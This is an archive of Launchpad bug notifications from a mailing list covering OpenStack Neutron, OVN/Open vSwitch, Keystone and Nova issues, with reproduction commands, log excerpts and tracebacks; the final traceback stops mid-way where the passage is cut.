https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1852221] Re: ovs-vswitchd needs to be forced to reconfigure after adding protocols to bridges
2.15.0 contains the fix for this issue - marking Fix Released. ** Changed in: openvswitch (Ubuntu) Status: Triaged => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1852221 Title: ovs-vswitchd needs to be forced to reconfigure after adding protocols to bridges Status in OpenStack neutron-openvswitch charm: Invalid Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in kolla-ansible: New Status in neutron: New Status in openvswitch: New Status in neutron package in Ubuntu: Fix Released Status in openvswitch package in Ubuntu: Fix Released Status in neutron source package in Eoan: Fix Released Status in neutron source package in Focal: Fix Released Bug description: [Impact] When the neutron native ovs driver creates bridges it will sometimes apply/modify the supported openflow protocols on that bridge. The OpenVswitch versions shipped with Train and Ussuri don't support this which results in OF protocol mismatches when neutron performs operations on that bridge. The patch we are backporting here ensures that all protocol versions are set on the bridge at the point on create/init. [Test Case] * deploy Openstack Train * go to a compute host and do: sudo ovs-ofctl -O OpenFlow14 dump-flows br-int * ensure you do not see "negotiation failed" errors [Regression Potential] * this patch is ensuring that newly created Neutron ovs bridges have OpenFlow 1.0, 1.3 and 1.4 set on them. Neutron already supports these so is not expected to have any change in behaviour. The patch will not impact bridges that already exist (so will not fix them either if they are affected). -- As part of programming OpenvSwitch, Neutron will add to which protocols bridges support [0]. However, the Open vSwitch `ovs-vswitchd` process does not appear to always update its perspective of which protocol versions it should support for bridges: # ovs-ofctl -O OpenFlow14 dump-flows br-int 2019-11-12T12:52:56Z|1|vconn|WARN|unix:/var/run/openvswitch/br-int.mgmt: version negotiation failed (we support version 0x05, peer supports version 0x01) ovs-ofctl: br-int: failed to connect to socket (Broken pipe) # systemctl restart ovsdb-server # ovs-ofctl -O OpenFlow14 dump-flows br-int  cookie=0x84ead4b79da3289a, duration=1.576s, table=0, n_packets=0, n_bytes=0, priority=65535,vlan_tci=0x0fff/0x1fff actions=drop  cookie=0x84ead4b79da3289a, duration=1.352s, table=0, n_packets=0, n_bytes=0, priority=5,in_port="int-br-ex",dl_dst=fa:16:3f:69:2e:c6 actions=goto_table:4 ... (Success) The restart of the `ovsdb-server` process above will make `ovs- vswitchd` reassess its configuration. 0: https://github.com/openstack/neutron/blob/0fa7e74ebb386b178d36ae684ff04f03bdd6cb0d/neutron/agent/common/ovs_lib.py#L281 To manage notifications about this bug go to: https://bugs.launchpad.net/charm-neutron-openvswitch/+bug/1852221/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1749425] Re: Neutron integrated with OpenVSwitch drops packets and fails to plug/unplug interfaces from OVS on router interfaces at scale
Marking OVS task as invalid as it appears this is a neutron bug related to configuration of VRRP for HA routers. ** Changed in: openvswitch (Ubuntu) Status: Incomplete => Invalid -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1749425 Title: Neutron integrated with OpenVSwitch drops packets and fails to plug/unplug interfaces from OVS on router interfaces at scale Status in neutron: New Status in openvswitch package in Ubuntu: Invalid Bug description: Description:Ubuntu 16.04.3 LTS Release:16.04 Linux 4.4.0-96-generic on AMD64 Neutron 2:10.0.4-0ubuntu2~cloud0 from Cloud Archive xenial-updates/ocata OpenVSwitch 2.6.1-0ubuntu5.2~cloud0 from Cloud Archive xenial-upates/ocata In an environment with three bare-metal Neutron deployments, hosting upward of 300 routers, with approximately the same number of instances, typically one router per instance, packet loss on instances accessed via floating IPs, including complete connectivity loss, is experienced. The problem is exacerbated by enabling L3HA, likely due to the increase in router namespaces to be scheduled and managed, and the additional scheduling work of bringing up keepalived and monitoring the keepalived VIP. Reducing the number of routers and rescheduling routers on new hosts, causing the routers to undergo a full recreation of namespace, iptables rules, and replugging of interfaces into OVS will correct packet loss or connectivity loss on impacted routers. On Neutron hosts in this environment, we have used systemtap to trace calls to kfree_skb which reveals the majority of dropped packets occur in the openvswitch module, notably on the br-int bridge. Inspecting the state of OVS shows many qtap interfaces which are no longer present on the Neutron host which are still plugged in to OVS. Diagnostic outputs in following comments. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1749425/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1924776] [NEW] [ovn] use of address scopes does not automatically disable router snat
Public bug reported: OpenStack Ussuri OVN 20.03.x Ubuntu 20.04 When multiple networks/subnets are attached to a router which all form part of the same subnet pool and associated address scope SNAT is not automatically disabled to support routing between the subnets attached to the router. Ensuring the router is created with SNAT disabled resolves this issue but that's an extra non-obvious step for a cloud admin/end user. ** Affects: neutron Importance: Undecided Status: New ** Affects: neutron (Ubuntu) Importance: Undecided Status: New ** Also affects: neutron (Ubuntu) Importance: Undecided Status: New ** Summary changed: - [ovn] use of address scopes does not automatically disable snat + [ovn] use of address scopes does not automatically disable router snat -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1924776 Title: [ovn] use of address scopes does not automatically disable router snat Status in neutron: New Status in neutron package in Ubuntu: New Bug description: OpenStack Ussuri OVN 20.03.x Ubuntu 20.04 When multiple networks/subnets are attached to a router which all form part of the same subnet pool and associated address scope SNAT is not automatically disabled to support routing between the subnets attached to the router. Ensuring the router is created with SNAT disabled resolves this issue but that's an extra non-obvious step for a cloud admin/end user. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1924776/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1922089] Re: [ovn] enable_snat cannot be disabled once enabled
** Also affects: neutron Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1922089 Title: [ovn] enable_snat cannot be disabled once enabled Status in neutron: New Status in neutron package in Ubuntu: New Bug description: Hi, Using Openstack focal/ussuri - ovn version 20.03.1-0ubuntu1.2 and neutron 2:16.2.0-0ubuntu2. If "enable_snat" is enabled on an external gateway on a router, it's not possible to disable it without completely removing said gateway from the router. For example : I have a subnet called subnet_axino_test - 10.0.100.0/24 I run the following : $ openstack router create router_axino_test $ openstack router set --disable-snat --external-gateway net_stg-external router_axino_test $ openstack router add subnet router_axino_test subnet_axino_test And so on OVN, I get nothing : $ sudo ovn-nbctl list NAT |grep -B5 -A4 10.131.100.0/24 Now, I enable SNAT : $ openstack router set --enable-snat --external-gateway net_stg-external router_axino_test This correctly adds an OVN SNAT entry as follows : $ sudo ovn-nbctl list NAT |grep -B5 -A4 10.131.100.0/24 _uuid : a65cc4b8-14ae-4ce4-b274-10eefdcc51dc external_ids: {} external_ip : "A.B.C.D" external_mac: [] logical_ip : "10.131.100.0/24" logical_port: [] options : {} type: snat Now, I remove SNAT from the router : $ openstack router set --disable-snat --external-gateway net_stg-external router_axino_test I confirm this : $ openstack router show router_axino_test | grep enable_snat | external_gateway_info | {"network_id": "4fb8304e-7adb-4cc3-bae5-deb968263eb0", "external_fixed_ips": [{"subnet_id": "6d47-1e44-41af-8f64-dd802d5c3ddc", "ip_address": "A.B.C.D"}], "enable_snat": false} | Above, you can see that "enable_snat" is "false". So I would expect OVN to _not_ have a NAT entry. Yet, it does : $ sudo ovn-nbctl list NAT |grep -B5 -A4 10.131.100.0/24 _uuid : a65cc4b8-14ae-4ce4-b274-10eefdcc51dc external_ids: {} external_ip : "162.213.34.141" external_mac: [] logical_ip : "10.131.100.0/24" logical_port: [] options : {} type: snat The only way to remove SNAT is to completely remove the external gateway from the router, and to re-add it with SNAT disabled : $ openstack router unset --external-gateway router_axino_test $ openstack router set --disable-snat --external-gateway net_stg-external router_axino_test Note that this requires removing all the floating IPs from VMs behind this router, which obviously makes them unreachable - which is less than ideal in production. Thanks To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1922089/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1924765] [NEW] [ovn] fip assignment to instance via router with snat disabled is broken
Public bug reported: Ubuntu: 20.04 OpenStack: Ussuri Networking: OVN (20.03.x) Network topology: Geneve overlay network for project networks, router has snat disabled and the project network and the external network are all in the same address scope and subnet pool. OVN routers are simply acting as L3 routers and instances on the project network can be directly accessed by the address assigned to their port (with appropriate route configuration in the outside of openstack world). Issue: Its possible to create and then associate a floating IP on the external network with an instance attached to the project network - however this does not work - access to the instance via the FIP is broken, as is access to its fixed IP (when this worked OK before). Thoughts: The concept of a FIP is very much NAT centric, and in the described configuration NAT is very much disabled. This idea seems to have worked way back in icehouse, however does not work at Ussuri. If this is not a supported network model, the association of the FIP to the instance should error with an appropriate message that NAT is not supported to the in-path router to the external network. ** Affects: neutron Importance: Undecided Status: New ** Affects: neutron (Ubuntu) Importance: Undecided Status: New ** Summary changed: - [ovn] fip assignment to router with snat disabled broken + [ovn] fip assignment to instance via router with snat disabled is broken ** Description changed: + Ubuntu: 20.04 + OpenStack: Ussuri + Networking: OVN (20.03.x) + Network topology: Geneve overlay network for project networks, router has snat disabled and the project network and the external network are all in the same address scope and subnet pool. OVN routers are simply acting as L3 routers and instances on the project network can be directly accessed by the address assigned to their port (with appropriate route configuration in the outside of openstack world). Issue: Its possible to create and then associate a floating IP on the external network with an instance attached to the project network - however this does not work - access to the instance via the FIP is broken, as is access to its fixed IP (when this worked OK before). Thoughts: The concept of a FIP is very much NAT centric, and in the described configuration NAT is very much disabled. This idea seems to have worked way back in icehouse, however does not work at Ussuri. If this is not a supported network model, the association of the FIP to the instance should error with an appropriate message that NAT is not supported to the in-path router to the external network. ** Also affects: neutron Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1924765 Title: [ovn] fip assignment to instance via router with snat disabled is broken Status in neutron: New Status in neutron package in Ubuntu: New Bug description: Ubuntu: 20.04 OpenStack: Ussuri Networking: OVN (20.03.x) Network topology: Geneve overlay network for project networks, router has snat disabled and the project network and the external network are all in the same address scope and subnet pool. OVN routers are simply acting as L3 routers and instances on the project network can be directly accessed by the address assigned to their port (with appropriate route configuration in the outside of openstack world). Issue: Its possible to create and then associate a floating IP on the external network with an instance attached to the project network - however this does not work - access to the instance via the FIP is broken, as is access to its fixed IP (when this worked OK before). Thoughts: The concept of a FIP is very much NAT centric, and in the described configuration NAT is very much disabled. This idea seems to have worked way back in icehouse, however does not work at Ussuri. If this is not a supported network model, the association of the FIP to the instance should error with an appropriate message that NAT is not supported to the in-path router to the external network. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1924765/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1907686] Re: ovn: instance unable to retrieve metadata
2.13.3 uploaded for focal and groovy to: https://launchpad.net/~ci-train-ppa-service/+archive/ubuntu/3690 for testing. ** No longer affects: openvswitch (Ubuntu Bionic) ** Also affects: cloud-archive Importance: Undecided Status: New ** Also affects: cloud-archive/ussuri Importance: Undecided Status: New ** Also affects: cloud-archive/victoria Importance: Undecided Status: New ** Also affects: cloud-archive/wallaby Importance: Undecided Status: New ** Changed in: cloud-archive/wallaby Status: New => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1907686 Title: ovn: instance unable to retrieve metadata Status in charm-ovn-chassis: Invalid Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: New Status in Ubuntu Cloud Archive victoria series: New Status in Ubuntu Cloud Archive wallaby series: Fix Released Status in neutron: Invalid Status in openvswitch package in Ubuntu: Fix Released Status in openvswitch source package in Focal: Triaged Status in openvswitch source package in Groovy: Triaged Status in openvswitch source package in Hirsute: Fix Released Bug description: Ubuntu:focal OpenStack: ussuri Instance port: hardware offloaded instance created, attempts to access metadata - metadata agent can't resolve the port/network combination: 2020-12-10 15:00:18.258 4732 INFO neutron.agent.ovn.metadata.agent [-] Port d65418a6-d0e9-47e6-84ba-3d02fe75131a in datapath 37706e4d-ce2a-4d81-8c61-3fd12437a0a7 bound to our ch assis 2020-12-10 15:00:31.672 8062 ERROR neutron.agent.ovn.metadata.server [-] No port found in network 37706e4d-ce2a-4d81-8c61-3fd12437a0a7 with IP address 10.5.1.155 2020-12-10 15:00:31.673 8062 INFO eventlet.wsgi.server [-] 10.5.1.155, "GET /openstack HTTP/1.1" status: 404 len: 297 time: 0.0043790 2020-12-10 15:00:34.639 8062 ERROR neutron.agent.ovn.metadata.server [-] No port found in network 37706e4d-ce2a-4d81-8c61-3fd12437a0a7 with IP address 10.5.1.155 2020-12-10 15:00:34.639 8062 INFO eventlet.wsgi.server [-] 10.5.1.155, "GET /openstack HTTP/1.1" status: 404 len: 297 time: 0.0040138 To manage notifications about this bug go to: https://bugs.launchpad.net/charm-ovn-chassis/+bug/1907686/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1890432] Re: Create subnet is failing under high load with OVN
Backports https://review.opendev.org/c/openstack/neutron/+/774256 https://review.opendev.org/c/openstack/neutron/+/774135 ** No longer affects: charm-neutron-api -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1890432 Title: Create subnet is failing under high load with OVN Status in neutron: Fix Committed Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Triaged Status in neutron source package in Groovy: Triaged Bug description: Under a high concurrency level create subnet is starting to fail. (12-14% failure rate) The bundle is OVN / Ussuri. neutronclient.common.exceptions.Conflict: Unable to complete operation on subnet This subnet is being modified by another concurrent operation. Stacktrace: https://pastebin.ubuntu.com/p/sQ5CqD6NyS/ Rally task: {% set flavor_name = flavor_name or "m1.medium" %} {% set image_name = image_name or "bionic-kvm" %} --- NeutronNetworks.create_and_delete_subnets: - args: network_create_args: {} subnet_create_args: {} subnet_cidr_start: "1.1.0.0/30" subnets_per_network: 2 runner: type: "constant" times: 100 concurrency: 10 context: network: {} users: tenants: 30 users_per_tenant: 1 quotas: neutron: network: -1 subnet: -1 Concurrency level set to 1 instead of 10 is not triggering the issue. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1890432/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1890432] Re: Create subnet is failing under high load with OVN
Hirsute/Wallaby packages include the fix from: https://review.opendev.org/c/openstack/neutron/+/745330/ So marked "Fix Released" for this target. Focal/Ussuri and Groovy/Wallaby - fix has been merged into the neutron table branch for each release however no new point releases from Neutron for these two release targets yet. ** Changed in: neutron Status: In Progress => Fix Committed ** Changed in: neutron (Ubuntu) Status: Triaged => Invalid ** Changed in: neutron (Ubuntu) Status: Invalid => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1890432 Title: Create subnet is failing under high load with OVN Status in neutron: Fix Committed Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Triaged Status in neutron source package in Groovy: Triaged Bug description: Under a high concurrency level create subnet is starting to fail. (12-14% failure rate) The bundle is OVN / Ussuri. neutronclient.common.exceptions.Conflict: Unable to complete operation on subnet This subnet is being modified by another concurrent operation. Stacktrace: https://pastebin.ubuntu.com/p/sQ5CqD6NyS/ Rally task: {% set flavor_name = flavor_name or "m1.medium" %} {% set image_name = image_name or "bionic-kvm" %} --- NeutronNetworks.create_and_delete_subnets: - args: network_create_args: {} subnet_create_args: {} subnet_cidr_start: "1.1.0.0/30" subnets_per_network: 2 runner: type: "constant" times: 100 concurrency: 10 context: network: {} users: tenants: 30 users_per_tenant: 1 quotas: neutron: network: -1 subnet: -1 Concurrency level set to 1 instead of 10 is not triggering the issue. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1890432/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1907686] Re: instance unable to retrieve metadata
Note that the fact the port/instance was hardware offloaded is not material here - I just tripped on the same issue with virtio ports. ** Also affects: neutron Importance: Undecided Status: New ** Summary changed: - instance unable to retrieve metadata + ovn: instance unable to retrieve metadata -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1907686 Title: ovn: instance unable to retrieve metadata Status in charm-ovn-chassis: New Status in neutron: New Status in neutron package in Ubuntu: New Bug description: Ubuntu:focal OpenStack: ussuri Instance port: hardware offloaded instance created, attempts to access metadata - metadata agent can't resolve the port/network combination: 2020-12-10 15:00:18.258 4732 INFO neutron.agent.ovn.metadata.agent [-] Port d65418a6-d0e9-47e6-84ba-3d02fe75131a in datapath 37706e4d-ce2a-4d81-8c61-3fd12437a0a7 bound to our ch assis 2020-12-10 15:00:31.672 8062 ERROR neutron.agent.ovn.metadata.server [-] No port found in network 37706e4d-ce2a-4d81-8c61-3fd12437a0a7 with IP address 10.5.1.155 2020-12-10 15:00:31.673 8062 INFO eventlet.wsgi.server [-] 10.5.1.155, "GET /openstack HTTP/1.1" status: 404 len: 297 time: 0.0043790 2020-12-10 15:00:34.639 8062 ERROR neutron.agent.ovn.metadata.server [-] No port found in network 37706e4d-ce2a-4d81-8c61-3fd12437a0a7 with IP address 10.5.1.155 2020-12-10 15:00:34.639 8062 INFO eventlet.wsgi.server [-] 10.5.1.155, "GET /openstack HTTP/1.1" status: 404 len: 297 time: 0.0040138 To manage notifications about this bug go to: https://bugs.launchpad.net/charm-ovn-chassis/+bug/1907686/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1844616] Re: federated user creation creates duplicates of existing user accounts
** Project changed: charm-keystone => keystone ** Also affects: keystone (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1844616 Title: federated user creation creates duplicates of existing user accounts Status in OpenStack Identity (keystone): New Status in keystone package in Ubuntu: New Bug description: Keystone 15.0.0-0ubuntu1~cloud0 DISTRIB_CODENAME=bionic Charm cs:keystone-306 keystone-saml-mellon-3 We had a situation where two user accounts were found with the same name and user ID in both the local_user and federated_user table. This meant that running `openstack user show --domain mydomain username2` would fail with "More than one user exists with the name 'username2'". Listing users would show only one user account, and using the user uuid to 'user show' was working fine. I ended up removing the two rows from local_user to work around this. The bug however, is that federated users with the same name as one that was already located in local_user shouldn't be created like that. mysql> select * from local_user; +-+--+--+---+---++ | id | user_id | domain_id| name | failed_auth_count | failed_auth_at | +-+--+--+---+---++ | 3 | 1e0099400dd34adeba2ed6751064227a | 87fb238ef6d0430cbda59b08e3a1ea82 | admin | 0 | NULL | | 6 | 8840d047cca346e6a00e435306f72ffc | a1effaa626284677ade0fbe3e85c59bd | cinderv2_cinderv3 | 0 | NULL | | 9 | d71b70de0cdd4beba2e5f1d3842c93b1 | fa58dfa26889413e85b4855837952b74 | cinderv2_cinderv3 | 0 | NULL | | 12 | d0750dcc890543918fe043eb5782e0ed | a1effaa626284677ade0fbe3e85c59bd | gnocchi | 0 | NULL | | 15 | c870e8dc427841c08fbba94b824f5765 | fa58dfa26889413e85b4855837952b74 | gnocchi | 0 | NULL | | 18 | 964d6a7b3d8d4a49ac2ef2accd5350d3 | a1effaa626284677ade0fbe3e85c59bd | neutron | 0 | NULL | | 21 | e1e77e91a9ed4dde8230d80b752d4f5c | fa58dfa26889413e85b4855837952b74 | neutron | 0 | NULL | | 24 | d090c19794dd4f27b08deab6713bd4ac | a1effaa626284677ade0fbe3e85c59bd | nova_placement| 0 | NULL | | 27 | 9fbb011ce1fc495ebf716d5cb56cd007 | fa58dfa26889413e85b4855837952b74 | nova_placement| 0 | NULL | | 30 | 1bad96de0fcd41a3b30d2c4e4ad9bb05 | a1effaa626284677ade0fbe3e85c59bd | octavia | 0 | NULL | | 33 | f4da2edc5e8f461b8d71eee67eabe4c2 | fa58dfa26889413e85b4855837952b74 | octavia | 0 | NULL | | 36 | a4d97a3a5a6644eb92848b9ea40ba71f | a1effaa626284677ade0fbe3e85c59bd | barbican | 0 | NULL | | 39 | 4d827a03abb24855b6cc37602fe346a5 | fa58dfa26889413e85b4855837952b74 | barbican | 0 | NULL | | 42 | 63b4389e35e446199b4e6a57a789e89c | a1effaa626284677ade0fbe3e85c59bd | aodh | 0 | NULL | | 45 | 3222d274dd0347a080b5371a348356b3 | fa58dfa26889413e85b4855837952b74 | aodh | 0 | NULL | | 48 | 957f4a409dec46c6b44f38a80949f7d1 | a1effaa626284677ade0fbe3e85c59bd | swift | 0 | NULL | | 51 | 8a89ed1cd1984814b544070295a2854f | fa58dfa26889413e85b4855837952b74 | swift | 0 | NULL | | 54 | 1ee61ad58f0948eab3c43fdf95790dcd | a1effaa626284677ade0fbe3e85c59bd | designate | 0 | NULL | | 57 | 32475aeb4dc0469080581f9acc9f7905 | fa58dfa26889413e85b4855837952b74 | designate | 0 | NULL | | 60 | 79b9411206524f00b0d05d3112a03840 | a1effaa626284677ade0fbe3e85c59bd | glance| 0 | NULL | | 63 | 35257eb811d84e0091381e74d4fbca21 | fa58dfa26889413e85b4855837952b74 | glance| 0 | NULL | | 66 | d07d3c3c619c4478b196bb81b8a4ced5 | a1effaa626284677ade0fbe3e85c59bd | heat_heat-cfn | 0 | NULL
[Yahoo-eng-team] [Bug 1883929] Re: Upgrade from X/O -> B/Q breaks pci_devices in mysql for SR-IOV
How is the whitelist for PCI devices configured? if all of the PCI device naming changed as part of the OS upgrade (or maybe the firmware upgrade) do you also need to update the whitelist configuration for the charm? ** Also affects: charm-nova-compute Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1883929 Title: Upgrade from X/O -> B/Q breaks pci_devices in mysql for SR-IOV Status in OpenStack nova-compute charm: New Status in OpenStack Compute (nova): New Bug description: After upgrade from xenial/ocata to bionic/queens SR-IOV instance creation (--vnic-type direct) fails with missing devices: The pci_devices mysql table if filled with wrong PCI entries, that do not exist on the server. Restarting nova-compute and nova-cloud- controller services did not fix (rediscover) the proper PCI devices. Related errors: 2020-06-17 12:55:19.556 1182599 WARNING nova.pci.utils [req-76b21329-b364-4999-ac86-8c729cb91ac0 - - - - -] No net device was found for VF :d8:05.0: PciDeviceNotFoundById: PCI device :d8:05.0 not found 2020-06-17 12:55:19.603 1182599 WARNING nova.pci.utils [req-76b21329-b364-4999-ac86-8c729cb91ac0 - - - - -] No net device was found for VF :d8:05.1: PciDeviceNotFoundById: PCI device :d8:05.1 not found 2020-06-17 12:55:19.711 1182599 WARNING nova.pci.utils [req-76b21329-b364-4999-ac86-8c729cb91ac0 - - - - -] No net device was found for VF :d8:04.7: PciDeviceNotFoundById: PCI device :d8:04.7 not found Error instance creation: {u'message': u'Device :d8:04.4 not found: could not access /sys/bus/pci/devices/:d8:04.4/config: No such file or directory', u'code': 500, u'details': u'Traceback (most recent call last):\n File "/usr/lib/python2.7/dist-packa ges/nova/compute/manager.py", line 1863, in _do_build_and_run_instance\n filter_properties, request_spec)\n File "/usr/lib/python2.7/dist-packages/nova/compute/manager.py", line 2143, in _build_and_run_instance\ninstance_uuid=instance.uuid, reason=six.text_type(e))\ nRescheduledException: Build of instance ec163abf-9c7a-460a-9512-4915f47af6b9 was re-scheduled: Device :d8:04.4 not found: could not access /sys/bus/pci/devices/:d8:04.4/config: No such file or directory\n', u'created': u'2020-06-17T11:46:11Z' To manage notifications about this bug go to: https://bugs.launchpad.net/charm-nova-compute/+bug/1883929/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1784342] Re: AttributeError: 'Subnet' object has no attribute '_obj_network_id'
*** This bug is a duplicate of bug 1839658 *** https://bugs.launchpad.net/bugs/1839658 Ah - this behaviour was enforced @ train see bug 1839658 ** This bug has been marked a duplicate of bug 1839658 "subnet" register in the DB can have network_id=NULL -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1784342 Title: AttributeError: 'Subnet' object has no attribute '_obj_network_id' Status in neutron: Confirmed Status in neutron package in Ubuntu: Confirmed Bug description: Running rally caused subnets to be created without a network_id causing this AttributeError. OpenStack Queens RDO packages [root@controller1 ~]# rpm -qa | grep -i neutron python-neutron-12.0.2-1.el7.noarch openstack-neutron-12.0.2-1.el7.noarch python2-neutron-dynamic-routing-12.0.1-1.el7.noarch python2-neutron-lib-1.13.0-1.el7.noarch openstack-neutron-dynamic-routing-common-12.0.1-1.el7.noarch python2-neutronclient-6.7.0-1.el7.noarch openstack-neutron-bgp-dragent-12.0.1-1.el7.noarch openstack-neutron-common-12.0.2-1.el7.noarch openstack-neutron-ml2-12.0.2-1.el7.noarch MariaDB [neutron]> select project_id, id, name, network_id, cidr from subnets where network_id is null; +--+--+---++-+ | project_id | id | name | network_id | cidr| +--+--+---++-+ | b80468629bc5410ca2c53a7cfbf002b3 | 7a23c72b- 3df8-4641-a494-af7642563c8e | s_rally_1e4bebf1_1s3IN6mo | NULL | 1.9.13.0/24 | | b80468629bc5410ca2c53a7cfbf002b3 | f7a57946-4814-477a-9649-cc475fb4e7b2 | s_rally_1e4bebf1_qWSFSMs9 | NULL | 1.5.20.0/24 | +--+--+---++-+ 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation [req-c921b9fb-499b-41c1-9103-93e71a70820c b6b96932bbef41fdbf957c2dc01776aa 050c556faa5944a8953126c867313770 - default default] GET failed.: AttributeError: 'Subnet' object has no attribute '_obj_network_id' 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation Traceback (most recent call last): 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation File "/usr/lib/python2.7/site-packages/pecan/core.py", line 678, in __call__ 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation self.invoke_controller(controller, args, kwargs, state) 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation File "/usr/lib/python2.7/site-packages/pecan/core.py", line 569, in invoke_controller 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation result = controller(*args, **kwargs) 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation File "/usr/lib/python2.7/site-packages/neutron/db/api.py", line 91, in wrapped 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation setattr(e, '_RETRY_EXCEEDED', True) 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation File "/usr/lib/python2.7/site-packages/oslo_utils/excutils.py", line 220, in __exit__ 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation self.force_reraise() 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation File "/usr/lib/python2.7/site-packages/oslo_utils/excutils.py", line 196, in force_reraise 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation six.reraise(self.type_, self.value, self.tb) 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation File "/usr/lib/python2.7/site-packages/neutron/db/api.py", line 87, in wrapped 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation return f(*args, **kwargs) 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation File "/usr/lib/python2.7/site-packages/oslo_db/api.py", line 147, in wrapper 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation ectxt.value = e.inner_exc 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation File "/usr/lib/python2.7/site-packages/oslo_utils/excutils.py", line 220, in __exit__ 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation self.force_reraise() 2018-07-30 10:35:13.351 42618 ERROR neutron.pecan_wsgi.hooks.translation File "/usr/lib/python2.7/site-packages/oslo_utils/excutils.py", line 196, in force_reraise 2018-07-30 10:35:13.351 42618 ERROR 